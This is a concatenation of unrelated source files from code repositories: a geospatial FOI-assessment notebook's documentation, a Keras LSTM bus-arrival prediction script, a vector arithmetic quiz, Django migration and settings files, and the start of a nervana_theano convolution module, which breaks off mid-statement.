The FOI assessment notebook is based on the principle that inside of a homogenous FOI there should be only one type of pixels. In the same idea, a FOI which respects the 1-1 cardinalityshould not include clusters of pixels larger than a specified threshold (we can consider dispersed pixels different than the main class as “noise”).<br>
The FOI Assessment performs a spatial analysis on a "thematic raster" produced in advance. The thematic raster can be the result of any image/raster processing method yielding a class label for each pixel - crop classification, behavior analysis of land phenomenon, gridded data on soil, slope, humidity, etc.<br>
As an example, if the thematic raster is the result of a crop classification, a homogeneous FOI should have only one type of pixels that represent the respective crop, a cardinal FOI should not include any cluster of pixels from other class larger than a specified threshold.
If the thematic raster is the result of a behavior analysis, all the pixels inside an FOI should behave in the same way during a period of time.<br>
For both heterogeneity and cardinality, the notebook provides two methods for the analysis: one based area calculation (version 1) and one based on cluster size calculation (version 2). Both methods have similar results.
<br>
<H2>Version 1</H2>
The first version requires the connection to a database server (PostgreSQL with PostGIS extension)<br>
For the heterogeneity analysis the following steps are required (the steps correspond to the numbering on the interface):<br>
1. Connect to the database (at the moment only „Database connection settings” are required)<br>
a) Upload the reference data shapefile to the server. It is provided a graphical interface for upload.<br>
b) Import uploaded shapefile to the database, specifying the name for the table that will be created in the database.<br>
2. Upload the raster „thematic” image. A graphical interface is provided. The accepted files are tif or tiff files. The thematic raster should be a one band raster file, with the pixel values representing the classes (like crop type or type of behaviour)<br>
3. Prepare FOI procedure – Allows the user to create the database functions on the database server. This procedure creates the necessary function and stored procedures on the database server.<br>
4. Select the required files for analysis:<br>
a) Vector file: the data on which the analysis will be applied. In case that we have more shapefiles uploaded on the server, this functionality allows us to select the one that we want to analyze.<br>
b) Thematic raster: the thematic raster provided. In case that we have more rasters uploaded on the server, this functionality allows us to select the one that we want to use on the analysis.<br>
c) YAML file that holds the classes form the thematic raster file: this file specifies the classes of pixels from the thematic raster and can also provide the meaning of those classes. It should have the following structure:<br>
<code>example.yml</code><br>
<code>category_map:
0: Unclasified
1: Class1
2: Class2
3: Class3
4: Class4
5: Class5
6: Class6
7: Class7
8: Class8
9: Class9
10: Class10</code><br>
Class1, Class2 can be replaced by the meaning of the class (like Wheat, Maize, etc. or by behavior name or any other ….).<br>
The YAML file should include all the classes that exist in the thematic raster. It is provided a graphical interface for upload.<br>
5. Analysis parameters:<br>
Heterogeneity thresholds: in order to exclude the influence of „noise” pixels, the user can specify the heterogeneity thresholds (for example only the FOIs where one class of pixels have a percentage between 30 and 70 is considered heterogeneous).<br>
Minimum area for clusters selection: the user can specify the minimum area of the cluster that are considered a cardinality issue, in square meters. Of example the clusters smaller than 2000 square meters can be considered as not influencing the FOI cardinality.<br>
6. Run FOI procedure.<br>
Starts the FOI analysis. The result of the analysis is represented by three shapefiles that are stored on the “output_data” folder (/cbm/tmp/foi/output_data).<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foih_v1.shp</b> – represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_h – heterogeneity flag (0 for homogeneous FOIs and 1 for heterogeneous FOIs)<br>
• number of pixels for each class (the name of the attribute is the name of the class)<br>
• total number of pixel for the respective FOI<br>
• percentage of pixels from each class (number of pixels for each class / total number of pixels inside the FOI)<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_v1.shp</b> - represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_c – cardinality flag (0 for FOIs respecting the 1-1 cardinality and 1 for FOIs not respecting the 1-1 cardinality). As a result of this analysis, the FOIs that include more than one cluster of pixel from different classes bigger than the threshold are considered non-cardinal. For example and FOI that includes two clusters of pixels from different classes (one arable land and non-agricultural area), each of the clusters bigger than the threshold (ex. 2000 square meters), is considered as not respecting the 1-1 cardinality.<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_clusters_v1.shp</b> – represents only the clusters of pixels that are setting the FOI cardinality (for example if an FOI includes three clusters of pixels bigger that the threshold, only those clusters will be saved in this shapefile)<br>
<H2>Version 2</H2>
The second version does not require a database server. All the calculations are made at pixel level using Python function.<br>
The interface and the steps are similar to the ones from the Version 1. The main difference is that it does not include the functionality for database connection and creating the functions on the database server.<br>
The different options available:<br>
Connectivity type: 8 or 4 connected pixels (4 indicating that diagonal pixels are not considered directly adjacent for polygon membership purposes or 8 indicating they are)<br>
Negative buffer: user can apply a negative buffer on the FOI in order to reduce the influence of boundary influence on the analysis (roads, adjacent FOIs, etc.)<br>
Cluster size (in pixels): the minimum number of pixels for which a cluster is taken into account.<br>
The result of the analysis is represented by two shapefiles that are stored on the “output_data” folder (/cbm/tmp/foi/output_data).<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foih_v2.shp</b> – represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_h – heterogeneity flag (0 for homogeneous FOIs and 1 for heterogeneous FOIs)<br>
• number of pixels for each class (the name of the attribute is the name of the class)<br>
• total number of pixel for the respective FOI<br>
• percentage of pixels from each class (number of pixels for each class / total number of pixels inside the FOI)<br>
<b>name of the shapefile dataset (without extension) that needs to be tested + foic_v2.shp</b> - represents the initial shapefile and during the analysis the following attributes are added:<br>
• foi_c – cardinality flag (0 for FOIs respecting the 1-1 cardinality and 1 for FOIs not respecting the 1-1 cardinality). As a result of this analysis, the FOIs that include more than one cluster of pixels from different classes bigger than the threshold are considered not respecting the 1-1 cardinality. For example and FOI that includes two clusters of pixels from different classes (one arable land and non-agricultural area), each of the clusters bigger than the threshold (ex. 20 pixels), is considered as not respecting the 1-1 cardinality.<br>
• Clusters – the information about the clusters of pixels identified inside the FOI, as pair of pixel class and cluster size: for example (3, 25), (5, 120) means that inside the FOI we have identified two clusters: one of pixels from class 3 and the cluster size is 25 pixels and another one with pixels of class 5 and cluster size 120 pixels.<br>
Author:<br>
Gilbert Voican
"""
wbox = widgets.HTML(
value=html,
placeholder="Documentation",
description="")
return wbox
|
[
"Konstantinos.ANASTASAKIS@ext.ec.europa.eu"
] |
Konstantinos.ANASTASAKIS@ext.ec.europa.eu
|
4c75fb886c4b239e33e380d908655600d93ee545
|
29c38a4d4151e91ceedf96995ef6bc42e7aa8229
|
/lstm_bus_prediction.py
|
32f27addcff416cc0c636ce89ade844dcc00a0e5
|
[] |
no_license
|
NeuEIRG/OTL-
|
bbb4a9b92c71d17a04453cfe49a0fc9f841fc55e
|
63b01e088396f02dab30ce89cd4f3a47234355f3
|
refs/heads/master
| 2020-04-23T11:02:32.536059
| 2019-03-11T17:24:39
| 2019-03-11T17:24:39
| 171,122,551
| 10
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,306
|
py
|
from math import ceil
from math import floor
from math import sqrt
from numpy import split
from numpy import array
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from matplotlib import pyplot
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers import LSTM
# split a univariate dataset into train/test sets
# 训练集划分,将单变量数据集划分为池训练集和测试集
# 并且还有一点值得说明,训练LSTM的时候我们是以一天为step的训练的,而预测的时候是一周为step进行预测的,这也就是为什么要按周split数据集的原因
# 对于公交车数据来说,用30个历史数据预测当前到站时间
# 6698
def split_dataset(data):
# 讲前三年的数据作为训练集,将最后一年的数据作为测试集
train, test = data[0:4900], data[4900:6300]
print(len(data))
print(len(train))
print(len(test))
# 将训练数据重组为以周为单位的数据
# split函数是一个numpy库的函数,其作用是把一个array从左到右按顺序切分,其
# 切分长度不能超过array的元素个数,axis默认为0,即横向切分
train = array(split(train, len(train)/7))
test = array(split(test, len(test)/7))
return train, test
def max_min(data):
data=data.values
Max=max(data)
Min=min(data)
temp=[0]*len(data)
for i in range(len(data)):
temp[i]=(data[i]-Min)/(Max-Min)
return temp
def standardization(data):
for i in range(len(data)):
columns=data[i].columns
for col in columns:
data[i][col]=max_min(data[i][col])
def new_split_dataset(data):
for i in range(len(data)):
pass
# evaluate one or more weekly forecasts against expected values
# 根据预期值评价单周预测或者多周预测
def evaluate_forecasts(actual, predicted):
# 参数说明:actual是实际值,predicted是预测值
scores = list()
# calculate an RMSE score for each day
# 为所有周的每一天的预测值计算RMSE(均方根误差)评分
for i in range(actual.shape[1]):
# 计算平方误差
mse = mean_squared_error(actual[:, i], predicted[:, i])
# 计算均方根误差
rmse = sqrt(mse)
# 储存到scores容器中
scores.append(rmse)
# 计算均方根误差
s = 0
for row in range(actual.shape[0]):
for col in range(actual.shape[1]):
s += (actual[row, col] - predicted[row, col])**2
score = sqrt(s / (actual.shape[0] * actual.shape[1]))
return score, scores
# 计算得分的总和
def summarize_scores(name, score, scores):
# join函数(python系统自带函数)是将列(list)表转化为字符串的函数,单引号中的逗号是分隔符。
s_scores = ', '.join(['%.1f' % s for s in scores])
print('%s: [%.3f] %s' % (name, score, s_scores))
# convert history into inputs and outputs
def to_supervised(train, n_input, n_out=1):
# 参数说明:n_input是滑动窗口大小,n_out是未来预测的步长,默认为7即说明我们要预测未来7天,即一周,的数据。
# flatten data,数据扁平化
data = train.reshape((train.shape[0]*train.shape[1], train.shape[2]))
print('data shape',data.shape)
X, y = list(), list()
in_start = 0
# step over the entire history one time step at a time
for _ in range(len(data)):
# define the end of the input sequence
in_end = in_start + n_input # 预测的输入窗口截止索引(输入窗口大小:in_end-in_start=7)
out_end = in_end + n_out # 预测的输出窗口截止索引(输出窗口大小:out_end-in_end=7)
# ensure we have enough data for this instance,保证输出窗口的移动不会超过数据集的边界
if out_end < len(data):
# x_input = data[in_start:in_end, 0] # 由于是单特征预测,所以这里只取一个特征,x_input的结构是[1,2,...,8]这样的结构
# # 下面rashape的目的是将输出数据x_input转化为2d的形式,即[[1],[2],[3],..,[8]]的形式,这个是为了满足keras模型的输入
# x_input = x_input.reshape((len(x_input), 1)) # 这里要注意len()一个多维数组返回的是其最外层的维度大小
# X.append(x_input)
X.append(data[in_start:in_end, :])
y.append(data[in_end:out_end, 12]) # 标签y无需转化为2D形式
# move along one time step
in_start += 1
return array(X), array(y)
# train the model
def build_model(train, n_input):
# prepare data,将时间序列数据转化为符合监督学习的格式
train_x, train_y = to_supervised(train, n_input)
print("in build_model")
print("train_x, train_y",train_x.shape, train_y.shape)
# define parameters,确定参数
verbose, epochs, batch_size = 0, 70, 16
n_timesteps, n_features, n_outputs = train_x.shape[1], train_x.shape[2], train_y.shape[1]
print('n_timesteps, n_features, n_outputs',train_x.shape[1], train_x.shape[2], train_y.shape[1])
print('input_shape',n_timesteps, n_features)
# define model,定义模型结构
model = Sequential()
model.add(LSTM(200, activation='relu', input_shape=(n_timesteps, n_features)))
model.add(Dense(100, activation='relu'))
model.add(Dense(n_outputs))
model.compile(loss='mse', optimizer='adam')
# fit network,拟合网络
model.fit(train_x, train_y, epochs=epochs, batch_size=batch_size, verbose=verbose)
return model
'''
python不允许程序员选择采用传值还是传引用。
Python参数传递采用的肯定是“传对象引用”的方式。
这种方式相当于传值和传引用的一种综合。
如果函数收到的是一个可变对象(比如字典或者列表)的引用,
就能修改对象的原始值--相当于通过“传引用”来传递对象。
如果函数收到的是一个不可变对象(比如数字、字符或者元组)的引用,
就不能直接修改原始对象--相当于通过“传值'来传递对象。
'''
# make a forecast,进行一次预测
'''
forecast函数的预测规则:
n_input是滑动窗口的大小,即我们每次用最后n_input个周的历史数据去预测下一个周的数据,这个“历史数据”就来自
evaluate_model中history集合,即每次都用离待预测数据最近的n_input个连续数据去预测接下来最近时刻的情况,
这样充分利用了数据之间的时序信息,体现了时间序列模型与其他回归模型在实现上的不同。
'''
def forecast(model, history, n_input):
# flatten data,数据扁平
data = array(history)
data = data.reshape((data.shape[0]*data.shape[1], data.shape[2]))
# retrieve last observations for input data,从输入数据中提取最近的观测值
print('in forecast')
print('data shape',len(data))
input_x = data[-n_input:, :]
# reshape into [1, n_input, 1],讲数据变换成符合lstm模型的输入格式
input_x = input_x.reshape((1, input_x.shape[0], input_x.shape[1]))
# forecast the next week,预测下一周的数据
print('length of input_x',input_x.shape)
yhat = model.predict(input_x, verbose=0)
# we only want the vector forecast,这个地方不太清楚,为什么只取第一项,应该和model.predict的返回值有关
print('yhat',yhat)
print('\n')
yhat = yhat[0]
return yhat
# evaluate a single model
# 使用的是前移评价(Walk Forward Validation)方法(时间序列模型中的k折交叉验证)
'''
evaluate_model中history数据集合的作用和更新规则:
在最初history是等于训练集train的,随后,在每一轮的预测中,每取出一个测试集的样例,在预测函数forcast调用结束
之后就将其加入到history集合中,最后history=train+test
'''
def evaluate_model(train, test, n_input):
# fit model
model = build_model(train, n_input)
# history is a list of weekly data
# 注意这里为什么不写成history=train,因为python中只有引用,没有赋值,所以必须将train"复制"一份才可以赋值给history
history = [x for x in train]
# walk-forward validation over each week,对每一次预测都进行前移评价
predictions = list()
for i in range(len(test)):
# predict the week,得到一个test样例的预测结果
yhat_sequence = forecast(model, history, n_input)
# store the predictions,储存预测结果
predictions.append(yhat_sequence)
# get real observation and add to history for predicting the next week,讲该test样例当做历史数据加入到history数据集中作为下一次预测的输入
history.append(test[i, :])
# evaluate predictions days for each week,对每一周的预测结果进行评价
predictions = array(predictions)
mse = mean_squared_error(test[:, :, 12], predictions)
score, scores = evaluate_forecasts(test[:, :, 12], predictions)
return score, scores
|
[
"noreply@github.com"
] |
NeuEIRG.noreply@github.com
|
fde240b2585bc39894fa72155c2361f0b3504eba
|
1877498789048c4bbfec56e1cdbea65324b5a344
|
/quiz1.py
|
ae30c75832cb6e895e06b8c87abb6d78b11528da
|
[] |
no_license
|
rqnoble/vectors
|
7034679c44b234a7057178498b4c737268ecee63
|
56ed5bbcd1f8e7e6db6a5a4e486bd46621c85046
|
refs/heads/master
| 2021-01-19T10:39:20.697143
| 2017-02-16T16:21:20
| 2017-02-16T16:21:20
| 82,198,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
from vector import Vector
v = Vector([8.218,-9.341])
vv = Vector([-1.129,2.111])
print v.plus(vv)
v = Vector([7.119,8.215])
vv = Vector([-8.223,0.878])
print v.minus(vv)
v = Vector([1.671,-1.012,-0.318])
c = 7.41
print v.times_scalar(c)
|
[
"robb.qn@gmail.com"
] |
robb.qn@gmail.com
|
616dec02e3d4a188053dd731b090bf35d28cf7a7
|
7f570caf00f6319167811c4dde73b2aea802fecc
|
/Hackathon/demoPage/migrations/0027_auto_20180505_2143.py
|
e0b4bec2d5212cfa631dcc897cc20c27ac2e373c
|
[] |
no_license
|
pinchien/Healthcare-Hackathon
|
4d44de2b7a556e1da09f10599a45082241a67105
|
c1f9c3874ff95544455fa6a7df783e0d4231e00b
|
refs/heads/master
| 2020-03-16T05:58:24.605494
| 2018-05-07T05:22:24
| 2018-05-07T05:22:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 816
|
py
|
# Generated by Django 2.0.5 on 2018-05-05 21:43
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('demoPage', '0026_auto_20180505_2136'),
]
operations = [
migrations.DeleteModel(
name='PatientData',
),
migrations.AlterField(
model_name='healthdata',
name='inputTime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 5, 5, 21, 43, 23, 565428), null=True),
),
migrations.AlterField(
model_name='registerdata',
name='inputTime',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 5, 5, 21, 43, 23, 565428), null=True),
),
]
|
[
"eunice730711@gmail.com"
] |
eunice730711@gmail.com
|
825d1831a90ed786db9ab8760c0b7c7605b2a7f8
|
98a56d8a1914bd871cde7cf7b199dab16c0ff1df
|
/projeto/projeto/settings.py
|
165197ec1a9a76c33a39e26b9f3de5eacc3b2c5c
|
[
"Apache-2.0"
] |
permissive
|
hersonananias/Projeto_Django
|
47455e62455a17546f744d864db5bcae57e5f4e8
|
a9f5f508f73896ce9434c6e56d8d7c3d3e9d6397
|
refs/heads/master
| 2020-05-18T10:23:41.725956
| 2019-05-07T23:26:43
| 2019-05-07T23:26:43
| 184,352,787
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,132
|
py
|
"""
Django settings for projeto project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mrfduwp03vswx*$t(y(myv4#_@dudkla@waw^xdoj4i@-7(%*c'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
'curriculo',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'projeto.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'projeto.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"herson.ananias@aluno.faculdadeimpacta.com.br"
] |
herson.ananias@aluno.faculdadeimpacta.com.br
|
a3394a232daaaf1420a9a1059d76d723d0d91293
|
5479670e391f3e0353504de6af8e7043f3874368
|
/comments/migrations/0002_auto_20170814_0933.py
|
bd3ed6dbf6425d7598162ff2a7b8af095648b7da
|
[] |
no_license
|
seLzzf/web
|
555c43af7ea38c9387fd4515e7d7eaa5785d21f9
|
4535b04f9c2881949b3474038fe255526b91bdef
|
refs/heads/master
| 2021-07-19T17:12:23.166756
| 2017-10-25T15:14:08
| 2017-10-25T15:14:08
| 98,084,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 471
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-08-14 09:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('comments', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='message',
field=models.TextField(verbose_name='留言'),
),
]
|
[
"l271938333@gmail.com"
] |
l271938333@gmail.com
|
825efdebc5e4ceefb5c6788eaea3243e8d09e2d4
|
fa1ae88e5299fdeba3951564df755b8eca5d4344
|
/nervana_theano/conv.py
|
cd4fab5d92428dfd0e51e3c2efe297ce796ca0c0
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
Libardo1/nervana_theano
|
5cc1e32ea110a79f78544b17eb485d233ce1c178
|
1a31f7ee983ad3dc4cb07c12a5844e41f59abc5a
|
refs/heads/master
| 2021-01-17T12:58:24.047900
| 2015-05-07T20:15:03
| 2015-05-07T20:15:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,096
|
py
|
"""
This file contains code from nervanagpu, which is covered by the following
license:
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import theano
import theano.sandbox.cuda as cuda
from theano.sandbox.cuda.basic_ops import (host_from_gpu, gpu_from_host,
gpu_contiguous, gpu_alloc_empty)
import theano.misc.pycuda_init
from nervanagpu import nervanagpu
from nervanagpu.layers import _magic32, _flatten
from math import ceil
from operator import mul
from gemm import to_gputensor, NervanaOp, lib
def _compute_kernel_settings(N, C, K,
D=1, H=1, W=1,
T=1, R=1, S=1,
pad_d=0, pad_h=0, pad_w=0,
str_d=1, str_h=1, str_w=1,
grid_P=0, grid_Q=0, update_size=None):
"""
Most of this has been copy-pasted from nervanagpu's ConvLayer class.
It exists to avoid having to instantiate the layer classes inside the
Theano Ops.
"""
assert N % 8 == 0, "N dim must be multiple of 8"
assert K % 8 == 0, "K dim must be multiple of 8"
# Compute the output spatial dimensions
M = int(ceil(float(D - T + 1 + 2*pad_d) / str_d))
P = int(ceil(float(H - R + 1 + 2*pad_h) / str_h))
Q = int(ceil(float(W - S + 1 + 2*pad_w) / str_w))
NCK = (N,C,K)
TRS = (T,R,S)
DHW = (D,H,W)
MPQ = (M,P,Q)
padding = (pad_d, pad_h, pad_w)
strides = (str_d, str_h, str_w)
dimI = (C,D,H,W,N)
dimF = (C,T,R,S,K)
dimO = (K,M,P,Q,N)
dimI2 = (C*D*H*W,N)
dimF2 = (C*T*R*S,K)
dimO2 = (K*M*P*Q,N)
dimIew = (C*D*H,W*N)
dimFew = (C*T*R,S*K)
dimOew = (K*M*P,Q*N)
sizeI = reduce(mul, dimI, 1)
sizeF = reduce(mul, dimF, 1)
sizeO = reduce(mul, dimO, 1)
nOut = reduce(mul, MPQ, 1) * K
# precompute some multiplications for fast constant memory access
WN = W*N
HWN = H*WN
DHWN = D*HWN
RS = R*S
RST = T*RS
CRST = C*RST
PQ = P*Q
PM = P*M
PQM = M*PQ
QN = Q*N
PQN = P*QN
MPQN = M*PQN
# I can easily get the kernels working with larger values here..
# But this is what version 1 is coded to support.
assert PQM < 2**16, "Integer division is faster with 16bit numerators"
# Kernels can be recoded to support 32bit numerators at
# some performance loss.
assert CRST+8 < 2**16, "Integer division is faster with 16bit numerators"
# precompute grid dimensions
grid_N64 = N // 64 + (N % 64 != 0)
grid_K64 = K // 64 + (K % 64 != 0)
grid_C64 = CRST // 64 + (CRST % 64 != 0)
grid_N128 = N // 128 + (N % 128 != 0)
grid_K128 = K // 128 + (K % 128 != 0)
grid_C128 = CRST // 128 + (CRST % 128 != 0)
#TODO: add more 128x128 kernels for better performance at fp32.
fprop_grid = (PQM, grid_K64, grid_N64)
bprop_grid = (PQM, grid_C128, grid_N64)
fprop_block = (64, 1, 1)
bprop_block = (128, 1, 1)
fprop_size = "K64_N64"
bprop_size = "C128_N64"
#TODO: tune this further
if (update_size is None or update_size == "C64_K64" or update_size == "C128_K64") and \
